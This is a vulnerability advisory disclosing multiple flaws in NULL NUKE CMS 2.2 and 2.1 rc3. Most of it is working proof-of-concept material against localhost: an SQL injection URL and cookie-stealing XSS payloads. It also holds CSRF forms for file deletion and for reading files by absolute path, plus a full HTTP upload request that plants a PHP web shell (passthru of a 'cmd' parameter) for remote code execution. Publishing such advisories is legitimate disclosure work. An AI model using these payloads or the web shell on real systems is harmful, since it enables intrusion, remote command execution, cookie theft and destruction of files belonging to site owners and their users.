NULL NUKE CMS v2.2 Multiple Vulnerabilities


Vendor: nullwanton
Product web page: http://sourceforge.net/projects/nullnuke/
Affected version: 2.2 and 2.1 rc3

Summary: NULL-8x3-NUKE is a fast, powerful and secure cross platform CMS
for windows and Linux using base or full drive paths.

Desc: NULL NUKE CMS suffers from multiple remote vulnerabilities including
Stored/Reflected XSS, SQL Injection, Arbitrary File Upload, RCE, Arbitrary
File Deletion, Arbitrary File Access using absolute path and/or traversal,
Open Redirection, Parameter Traversal, and Cross-Site Request Forgery.

Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5185
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5185.php


13.04.2014

---


-------------------------------------
[*] SQL Injection, CSRF (msgid param)
-------------------------------------

http://localhost/nullnuke/msgbox.php?nxt=readmsg&view=1&msgid=7%27


----------------------------------------
[*] Stored XSS, CSRF (faqcattitle param)
----------------------------------------

<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=faq&nxt=FaqCatAdd" method="POST">
<input type="hidden" name="faqcattitle" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Execute!" />
</form>
</body></html>


-----------------------------------------------------------------------------------------
[*] Arbitrary File Upload at arbitrary location, CSRF, RCE (fupload[1], uploadpath param)
-----------------------------------------------------------------------------------------

POST /nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------117202350024276
Content-Length: 786

-----------------------------117202350024276
Content-Disposition: form-data; name="fupload[1]"; filename="shell.php"
Content-Type: application/octet-stream

<?php passthru($_GET['cmd']); ?>
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadpath"

C:/xampp/htdocs/nullnuke22/
-----------------------------117202350024276
Content-Disposition: form-data; name="_numfeilds"

1
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadform"

Upload
-----------------------------117202350024276
Content-Disposition: form-data; name="unpack_archive"

0
-----------------------------117202350024276
Content-Disposition: form-data; name="addfeild"

1
-----------------------------117202350024276--


--

<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here" method="POST" enctype="multipart/form-data">
<input type="hidden" name="fupload[1]" value="<?php passthru($_GET['cmd']); ?>" />
<input type="hidden" name="uploadpath" value="C:/xampp/htdocs/nullnuke22/" />
<input type="hidden" name="_numfeilds" value="1" />
<input type="hidden" name="uploadform" value="Upload" />
<input type="hidden" name="unpack_archive" value="0" />
<input type="hidden" name="addfeild" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>


---------------------------------------------------
[*] Arbitrary File Deletion, CSRF (dfarray[] param)
---------------------------------------------------

<html><body>
<form action="http://localhost/nullnuke2/admin.php?fct=file_types&nxt=fileSystem" method="POST">
<input type="hidden" name="delfile" value="Delete" />
<input type="hidden" name="dfarray[]" value="C:/secret_secrets.txt" />
<input type="submit" value="Execute!" />
</form>
</body></html>


-------------------------------------------------------------------------------------------
[*] Arbitrary File Read using absolute path, CSRF (file param, value needs to be in base64)
-------------------------------------------------------------------------------------------

http://localhost/nullnuke22/admin.php?fct=file_types&nxt=getfile&path=&file=QzpcdGVzdC50eHQ=

 - QzpcdGVzdC50eHQ= (C:\test.txt)


-------------------------------------------
[*] Open Redirect, CSRF (redirectlgn param)
-------------------------------------------

<html><body>
<form action="http://localhost/nullnuke22/login.php?nxt=chklogin" method="POST">
<input type="hidden" name="uname" value="admin" />
<input type="hidden" name="pass" value="admin" />
<input type="hidden" name="remlogin" value="0" />
<input type="hidden" name="redirectlgn" value="http://www.zeroscience.mk" />
<input type="hidden" name="stripit_form" value="uname|pass" />
<input type="hidden" name="mpn_sectype" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>


-----------------------------------------------------------------
[*] Reflected XSS, CSRF (upload param, Referer HTTP Header field)
-----------------------------------------------------------------

http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here1f454"><script>alert(1);</script>6747f198ae5

--

GET /nullnuke22/login.php?nxt=chklogin&uname=admin&pass=admin&remlogin=0&redirectlgn=http%3A%2F%2Flocalhost%2Fnullnuke22%2Fadmin.php%3Ffct%3Dfile_types%26nxt%3DfileSystem%26upload%3Dhere&stripit_form=uname%7Cpass&mpn_sectype=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=b55ec"><script>alert(document.cookie);</script>bb8d1b11bd9304d5f
Connection: keep-alive